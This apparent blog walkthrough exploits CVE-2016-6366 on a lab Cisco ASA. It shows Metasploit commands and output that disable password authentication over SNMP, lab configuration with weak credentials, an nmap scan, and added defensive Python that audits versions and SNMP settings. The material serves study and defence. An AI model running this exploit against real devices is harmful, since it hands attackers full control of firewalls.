Vuln - Cisco - CVE-2016-6366
Source: Internet  Published: surveillance matrix keyboard manual  Editor: 程序博客网  Time: 2024/04/30 14:35
The Cisco advisory at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp says:
A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.
Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.
Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.
Exploit Cisco CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run
[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed
Telnet to the target host; no password is required after the pass-disable payload has run.
$ telnet 192.168.206.114
Unprivileged Mode
ciscoasa> ?
  clear       Reset functions
  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Interactive help for commands
  login       Log in as a particular user
  logout      Exit from the EXEC
  no          Negate a command or set its defaults
  ping        Send echo messages
  quit        Exit from the EXEC
  show        Show running system information
  traceroute  Trace route to destination
Version
ciscoasa> show version

Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)

Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"

ciscoasa up 2 hours 25 mins

Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB

 0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
 1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
 2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
 3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10

ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:

Licensed features for this platform:
Virtual CPUs                      : 0              perpetual
Maximum Physical Interfaces       : 10             perpetual
Maximum VLANs                     : 50             perpetual
Inside Hosts                      : Unlimited      perpetual
Failover                          : Active/Standby perpetual
Encryption-DES                    : Enabled        perpetual
Encryption-3DES-AES               : Enabled        perpetual
Security Contexts                 : 0              perpetual
GTP/GPRS                          : Disabled       perpetual
AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual
Shared License                    : Disabled       perpetual
AnyConnect for Mobile             : Disabled       perpetual
AnyConnect for Cisco VPN Phone    : Disabled       perpetual
Advanced Endpoint Assessment      : Disabled       perpetual
UC Phone Proxy Sessions           : 2              perpetual
Total UC Proxy Sessions           : 2              perpetual
Botnet Traffic Filter             : Enabled        perpetual
Intercompany Media Engine         : Disabled       perpetual
Cluster                           : Disabled       perpetual

This platform has an ASAv VPN Premium license.

Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
Image type          : Release
Key version         : A

Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016
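The version string appears twice in this walkthrough: in the sysDescr.0 value returned to snmp_login and in the show version banner above. For a defender doing inventory, the useful step is to pull that string out of whatever text the device returned and compare it, as a tuple, against the first fixed release for its train. The following Python is an added example written for this page; it is not code from the page or from the RiskSense repository. It carries no fixed-release table of its own: FIXED_BY_TRAIN below holds an obviously constructed placeholder that must be replaced with the values from the Cisco advisory, and the sample inventory (hosts and sysDescr text other than the page's 192.168.206.114 / 9.2(1) pair) is constructed.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# ASA release strings look like "9.2(1)" or "9.1(7)23":
# major.minor(maintenance) followed by an optional interim number.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\((\d+)\)(\d+)?")

Version = Tuple[int, int, int, int]  # (major, minor, maintenance, interim)


def _to_tuple(m: "re.Match") -> Version:
    major, minor, maint, interim = m.groups()
    return (int(major), int(minor), int(maint), int(interim or 0))


def parse_asa_version(text: str) -> Optional[Version]:
    """Extract the first 'Version x.y(z)[n]' occurrence from free text such as a
    'show version' banner or an SNMP sysDescr.0 value.  The software version
    precedes 'Device Manager Version' in the banner, so first match is the one
    we want.  Returns None when no ASA-style version string is present."""
    m = re.search(r"Version\s+" + _VERSION_RE.pattern, text)
    return _to_tuple(m) if m else None


def parse_version_literal(literal: str) -> Version:
    """Parse a bare literal such as '9.1(7)23' with no surrounding text."""
    m = _VERSION_RE.fullmatch(literal.strip())
    if not m:
        raise ValueError(f"not an ASA version literal: {literal!r}")
    return _to_tuple(m)


def needs_upgrade(found: Version, fixed_literal: str) -> bool:
    """True when the running release is older than the fixed release given for
    its train.  Tuple comparison handles the interim number correctly, so
    9.1(7)23 compares greater than 9.1(7)."""
    fixed = parse_version_literal(fixed_literal)
    if found[:2] != fixed[:2]:
        raise ValueError("fixed release must belong to the same train as the running release")
    return found < fixed


def triage(inventory: Iterable[Tuple[str, str]],
           fixed_by_train: Dict[Tuple[int, int], str]) -> List[str]:
    """Return the hosts whose reported version is below the fixed release for
    their train.  Hosts with no parseable version, or on a train that is not in
    the table, are skipped rather than silently marked safe."""
    behind = []
    for host, text in inventory:
        v = parse_asa_version(text)
        if v is None or v[:2] not in fixed_by_train:
            continue
        if needs_upgrade(v, fixed_by_train[v[:2]]):
            behind.append(host)
    return behind


# PLACEHOLDER: not Cisco's fixed release.  Replace with the first fixed release
# per train from the advisory before using this for real triage.
FIXED_BY_TRAIN: Dict[Tuple[int, int], str] = {(9, 2): "9.2(4)"}

# Constructed inventory: the first entry is the lab device from this page, the
# other two are made up to show the interim-number and unknown-train paths.
SAMPLE_INVENTORY = [
    ("192.168.206.114", "Cisco Adaptive Security Appliance Version 9.2(1)"),
    ("10.0.0.2", "Cisco Adaptive Security Appliance Version 9.2(4)5"),
    ("10.0.0.3", "Cisco Adaptive Security Appliance Version 9.1(7)23"),
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY, FIXED_BY_TRAIN):
        print(f"{host}: running release is below the fixed release for its train")
```

Run against a list of (host, sysDescr) pairs collected by your own SNMP poller; the 9.1 host in the sample is deliberately left out of the placeholder table to show that an unknown train produces no verdict rather than a false "safe".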
Privileged Mode
ciscoasa> help enable
USAGE:
enable [<priv_level>]

DESCRIPTION:
enable  Turn on privileged commands
ciscoasa> enable ?
  <0-15>  Enter optional privilege level (0-15)
  <cr>
ciscoasa> enable
Password:
ciscoasa# configure terminal
ciscoasa(config)# ?
  aaa                           Enable, disable, or view user authentication, authorization and accounting
  aaa-server                    Configure a AAA server group or a AAA server
  access-group                  Bind an access-list to an interface to filter traffic
  access-list                   Configure an access control element
  arp                           Change or view ARP table, set ARP timeout value, view statistics
  as-path                       BGP autonomous system path filter
  asdm                          Configure Device Manager
  asp                           Configure ASP parameters
  auth-prompt                   Customize authentication challenge, reject or acceptance prompt
  auto-update                   Configure Auto Update
  banner                        Configure login/session banners
  bgp-community                 format for BGP community
  boot                          Set system boot parameters
  ca                            Certification authority
  call-home                     Smart Call-Home Configuration
  checkheaps                    Configure checkheap verification intervals
  class-map                     Configure MPF Class Map
  clear                         Clear
  client-update                 Configure and change client update parameters
  clock                         Configure time-of-day clock
  cluster                       Cluster configuration
  command-alias                 Create command alias
  community-list                Add a community list entry
  compression                   Configure global Compression parameters
  configure                     Configure using various methods
  console                       Serial console functions
  coredump                      Configure Coredump options
  crashinfo                     Enable/Disable writing crashinfo to flash
  crypto                        Configure IPSec, ISAKMP, Certification authority, key
  ctl-file                      Configure a ctl-file instance
  ctl-provider                  Configure a CTL Provider instance
  cts                           Cisco Trusted Security commands
  ddns                          Configure dynamic DNS update method
  dhcp-client                   Configure parameters for DHCP client operation
  dhcpd                         Configure DHCP Server
  dhcprelay                     Configure DHCP Relay Agent
  dns                           Add DNS functionality to an interface
  dns-group                     Set the global DNS server group
  dns-guard                     Enforce one DNS response per query
  domain-name                   Change domain name
  dynamic-access-policy-record  Dynamic Access Policy configuration commands
  dynamic-filter                Configure Dynamic Filter
  dynamic-map                   Configure crypto dynamic map
  enable                        Configure password for the enable command
  end                           Exit from configure mode
  established                   Allow inbound connections based on established connections
  event                         Configure event manager
  exit                          Exit from config mode
  failover                      Enable/disable failover feature
  filter                        Enable or disable URL, FTP, HTTPS, Java, and ActiveX filtering
  fips                          FIPS 140-2 compliance information
  firewall                      Switch to router/transparent mode
  fixup                         Add or delete inspection services
  flow-export                   Configure flow information export through NetFlow
  fragment                      Configure the IP fragment database
  ftp                           Set FTP mode
  ftp-map                       Configure advanced options for FTP inspection
  group-delimiter               The delimiter for tunnel-group lookup.
  group-policy                  Configure or remove a group policy
  gtp-map                       Configure advanced options for GTP inspection
  h225-map                      Configure advanced options for H225 inspection
  help                          Interactive help for commands
  hostname                      Change host name of the system
  hpm                           Configure TopN host statistics collection
  http                          Configure http server and https related commands
  http-map                      This command has been deprecated.
  icmp                          Configure access rules for ICMP traffic
  imap4s                        Configure the imap4s service
  interface                     Select an interface to configure
  ip                            Configure IP address pools
  ip                            Configure IP addresses, address pools, IDS, etc
  ipsec                         Configure transform-set, IPSec SA lifetime and PMTU Aging reset timer
  ipv6                          Configure IPv6 address pools
  ipv6                          Global IPv6 configuration commands
  ipv6-vpn-addr-assign          Global settings for VPN IP address assignment policy
  isakmp                        Configure ISAKMP options
  jumbo-frame                   Configure jumbo-frame support
  key                           Create various configuration keys
  l2tp                          Configure Global L2TP Parameters
  ldap                          Configure LDAP Mapping
  logging                       Configure logging levels, recipients and other options
  logout                        Logoff from config mode
  mac-address                   MAC address options
  mac-list                      Create a mac-list to filter based on MAC address
  management-access             Configure management access interface
  map                           Configure crypto map
  media-termination             Configure a media-termination instance
  mgcp-map                      Configure advanced options for MGCP inspection
  migrate                       Migrate IKEv1 configuration to IKEv2/SSL
  monitor-interface             Enable or disable failover monitoring on a specific interface
  mount                         Configure a system mount
  mroute                        Configure static multicast routes
  mtu                           Specify MTU(Maximum Transmission Unit) for an interface
  multicast-routing             Enable IP multicast
  name                          Associate a name with an IP address
  names                         Enable/Disable IP address to name mapping
  nat                           Associate a network with a pool of global IP addresses
  no                            Negate a command or set its defaults
  ntp                           Configure NTP
  nve                           Configure an Network Virtulization Endpoint (NVE)
  object                        Configure an object
  object-group                  Create an object group for use in 'access-list', etc
  object-group-search           Enables object group search algorithm
  pager                         Control page length for pagination
  passwd                        Change Telnet console access password
  password                      Configure password encryption
  password-policy               Configure password policy options
  phone-proxy                   Configure a Phone proxy instance
  pim                           Configure Protocol Independent Multicast
  policy-list                   Define IP Policy list
  policy-map                    Configure MPF Parameter Map
  pop3s                         Configure the pop3s service
  prefix-list                   Build a prefix list
  priority-queue                Enter sub-command mode to set priority-queue attributes
  privilege                     Configure privilege levels for commands
  prompt                        Configure session prompt display
  quit                          Exit from config mode
  quota                         Configure quotas
  regex                         Define a regular expression
  remote-access                 Configure SNMP trap threshold for VPN remote-access sessions
  route                         Configure a static route for an interface
  route-map                     Create route-map or enter route-map configuration mode
  router                        Enable a routing process
  same-security-traffic         Enable same security level interfaces to communicate
  scansafe                      Scansafe configuration
  service                       Configure system services
  service-interface             service-interface for dynamic interface types
  service-policy                Configure MPF service policy
  setup                         Pre-configure the system
  sla                           IP Service Level Agreement
  smtp-server                   Configure default SMTP server address to be used for Email
  smtps                         Configure the smtps service
  snmp                          Configure the SNMP options
  snmp-map                      Configure an snmp-map, to control the operation of the SNMP inspection
  snmp-server                   Modify SNMP engine parameters
  ssh                           Configure SSH options
  ssl                           Configure SSL options
  sunrpc-server                 Create SUNRPC services table
  sysopt                        Set system functional options
  tcp-map                       Configure advanced options for TCP inspection
  telnet                        Add telnet access to system console or set idle timeout
  terminal                      Set terminal line parameters
  tftp-server                   Configure default TFTP server address and directory
  threat-detection              Show threat detection information
  time-range                    Define time range entries
  timeout                       Configure maximum idle times
  tls-proxy                     Configure a TLS proxy instance or the maximum sessions
  track                         Object tracking configuration commands
  tunnel-group                  Create and manage the database of connection specific records for IPSec connections
  tunnel-group-map              Specify policy by which the tunnel-group name is derived from the content of a certificate.
  uc-ime                        Configure a Cisco Intercompany Media Engine (UC-IME) instance
  url-block                     Enable URL pending block buffer and long URL support
  url-cache                     Enable/Disable URL caching
  url-server                    Configure a URL filtering server
  user-identity                 Configure user-identity firewall
  username                      Configure user authentication local database
  virtual                       Configure address for authentication virtual servers
  vnmc                          Configure VNMC params
  vpdn                          Configure VPDN feature
  vpn                           Configure VPN parameters.
  vpn-addr-assign               Global settings for VPN IP address assignment policy
  vpn-sessiondb                 Configure the VPN Session Manager
  vpnsetup                      Configure VPN Setup Commands
  vxlan                         Configure VXLAN system parameters
  wccp                          Web-Cache Coordination Protocol Commands
  webvpn                        Configure the WebVPN service
  xlate                         Configure an xlate option
  zonelabs-integrity            ZoneLabs integrity Firewall Server Configuration
Cisco Terminal
ciscoasa> enable
Password:
ciscoasa# configure ?
  terminal  Configure using terminal/console
ciscoasa# configure terminal
ciscoasa(config)#
Cisco Interfaces
ciscoasa(config)# interface ?

configure mode commands/options:
  GigabitEthernet  GigabitEthernet IEEE 802.3z
  Management       Management interface
  Redundant        Redundant Interface
  TVI              Tenant Virtual Interface
  vni              VNI Interface
  <cr>
ciscoasa(config)# interface GigabitEthernet ?

configure mode commands/options:
  <0-0>  GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0?

configure mode commands/options:
  /
ciscoasa(config)# interface GigabitEthernet 0/?

configure mode commands/options:
  <0-2>  GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/0
Cisco Interfaces Config - set an IP address
ciscoasa(config-if)# ?

Interface configuration commands:
  authentication   authentication subcommands
  ddns             Configure dynamic DNS
  default          Set a command to its defaults
  delay            Specify interface throughput delay
  description      Interface specific description
  dhcp             Configure parameters for DHCP client
  dhcprelay        Configure DHCP Relay Agent
  duplex           Configure duplex operation
  exit             Exit from interface configuration mode
  flowcontrol      Configure flowcontrol operation
  hello-interval   Configures EIGRP-IPv4 hello interval
  help             Interactive help for interface subcommands
  hold-time        Configures EIGRP-IPv4 hold time
  igmp             IGMP interface commands
  ip               Configure the ip address
  ipv6             IPv6 interface subcommands
  mac-address      Assign MAC address to interface
  management-only  Dedicate an interface to management. Block thru traffic
  mfib             Interface Specific MFIB Control
  multicast        Configure multicast routing
  nameif           Assign name to interface
  no               Negate a command or set its defaults
  ospf             OSPF interface commands
  pim              PIM interface commands
  pppoe            Configure parameters for PPPoE client
  rip              Router Information Protocol
  security-level   Specify the security level of this interface after this keyword, Eg: 0, 100 etc. The relative security level between two interfaces determines the way the Adaptive Security Algorithm is applied. A lower security_level interface is outside relative to a higher level interface and equivalent interfaces are outside to each other
  shutdown         Shutdown the selected interface
  speed            Configure speed operation
  split-horizon    Configures EIGRP-IPv4 split-horizon
  summary-address  Configures EIGRP-IPv4 summary-address
ciscoasa(config-if)# ip address ?

interface mode commands/options:
  Hostname or A.B.C.D  Firewall's network interface address
  dhcp                 Keyword to use DHCP to poll for information. Enables the DHCP client feature on the specified interface
  pppoe                Keyword to use PPPoE to poll for information. Enables the PPPoE client feature on the specified interface
ciscoasa(config)# ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms
Enable snmp
ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public
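The snmp-server line above is the lab setting that makes the walkthrough work: an SNMPv2c manager with the community string "public", which is exactly the knowledge the advisory says the attacker must have. On a production device the defensive questions are whether any snmp-server host entry still uses v1/v2c, whether the community string is a well-known default, and whether the manager address is one you actually operate. The Python below is an added example written for this page, not code from the page or from Cisco: it audits snmp-server lines taken from an ASA running-config. It assumes that a "0" or "8" immediately after the community keyword is the ASA storage-encryption level rather than the string itself (inferred from the "community 0 public" form on the page), and the sample configuration other than the page's own line is constructed.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Community strings that scanners try first.  Constructed list; extend it to
# match your own policy.
WEAK_COMMUNITIES = {"public", "private", "cisco", "admin", "snmp"}


@dataclass
class SnmpFinding:
    line: str
    reasons: List[str] = field(default_factory=list)


def _community_after(tokens: List[str], idx: int) -> Optional[str]:
    """tokens[idx] is the 'community' keyword; return the string that follows.
    Assumption: a leading '0' (cleartext) or '8' (encrypted) is the ASA
    storage-encryption level, so skip it when another token follows."""
    rest = tokens[idx + 1:]
    if not rest:
        return None
    if rest[0] in ("0", "8") and len(rest) >= 2:
        return rest[1]
    return rest[0]


def _check_community(tokens: List[str], reasons: List[str]) -> None:
    if "community" not in tokens:
        return
    community = _community_after(tokens, tokens.index("community"))
    if community is None:
        reasons.append("community keyword without a string")
    elif community.lower() in WEAK_COMMUNITIES:
        reasons.append(f"well-known community string '{community}'")
    elif len(community) < 12:
        reasons.append(f"short community string ({len(community)} chars)")


def audit_snmp_config(config_text: str, allowed_hosts: Set[str]) -> List[SnmpFinding]:
    """Walk the running-config and report snmp-server lines that widen the
    exposure the advisory describes.  allowed_hosts is the set of manager
    addresses you actually operate."""
    findings: List[SnmpFinding] = []
    for raw in config_text.splitlines():
        line = raw.strip()
        tokens = line.split()
        if len(tokens) < 2 or tokens[0] != "snmp-server":
            continue
        reasons: List[str] = []
        if tokens[1] == "host" and len(tokens) >= 4:
            # snmp-server host <ifname> <ip> [trap|poll] [community ...] [version 3 <user>]
            manager = tokens[3]
            if manager not in allowed_hosts:
                reasons.append(f"manager {manager} is not on the SNMP allowlist")
            after_version = tokens[tokens.index("version") + 1:] if "version" in tokens else []
            if after_version[:1] != ["3"]:
                reasons.append("SNMPv1/v2c manager: the community string is the only authentication")
            _check_community(tokens, reasons)
        elif tokens[1] == "community":
            # Global community string applies to every v1/v2c manager.
            _check_community(tokens, reasons)
        if reasons:
            findings.append(SnmpFinding(line, reasons))
    return findings


# Constructed sample: the page's own lab line, a hardened v3 manager, and a
# global v2c community.
LAB_CONFIG = """\
snmp-server host inside 192.168.206.1 community 0 public
snmp-server host inside 10.10.10.5 version 3 netmon
snmp-server community 0 public
"""

if __name__ == "__main__":
    for f in audit_snmp_config(LAB_CONFIG, {"192.168.206.1", "10.10.10.5"}):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

Feed it the output of show running-config; the v3 line in the sample produces no finding because the manager is allowlisted and authentication is per-user rather than a shared string.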
Enable ssh
ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?

configure mode commands/options:
  general-keys  Generate a general purpose RSA key pair for signing and encryption
  label         Provide a label
  modulus       Provide number of modulus bits on the command line
  noconfirm     Specify this keyword to suppress all interactive prompting.
  usage-keys    Generate seperate RSA key pairs for signing and encryption
  <cr>
ciscoasa(config)# crypto key generate rsa modulus ?

configure mode commands/options:
  1024  1024 bits
  2048  2048 bits
  4096  4096 bits
  512   512 bits
  768   768 bits
ciscoasa(config)# ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)# ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)# ssh version 2
Enable Telnet
ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
Nmap scan
sec@gpg:~$ nmap -v -n -Pn -sV --open 192.168.206.114

Starting Nmap 6.40 ( http://nmap.org ) at 2016-09-26 04:01 CDT
NSE: Loaded 23 scripts for scanning.
Initiating Connect Scan at 04:01
Scanning 192.168.206.114 [1000 ports]
Discovered open port 23/tcp on 192.168.206.114
Discovered open port 22/tcp on 192.168.206.114
Completed Connect Scan at 04:01, 4.83s elapsed (1000 total ports)
Initiating Service scan at 04:01
Scanning 2 services on 192.168.206.114
Completed Service scan at 04:01, 0.00s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.206.114.
Nmap scan report for 192.168.206.114
Host is up (0.00040s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Cisco SSH 1.25 (protocol 2.0)
23/tcp open  telnet  Cisco ASA 5505 firewall telnetd
Service Info: OS: IOS; Device: firewall; CPE: cpe:/o:cisco:ios

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds
References
https://github.com/RiskSense-Ops/CVE-2016-6366/
http://paper.seebug.org/31/
http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp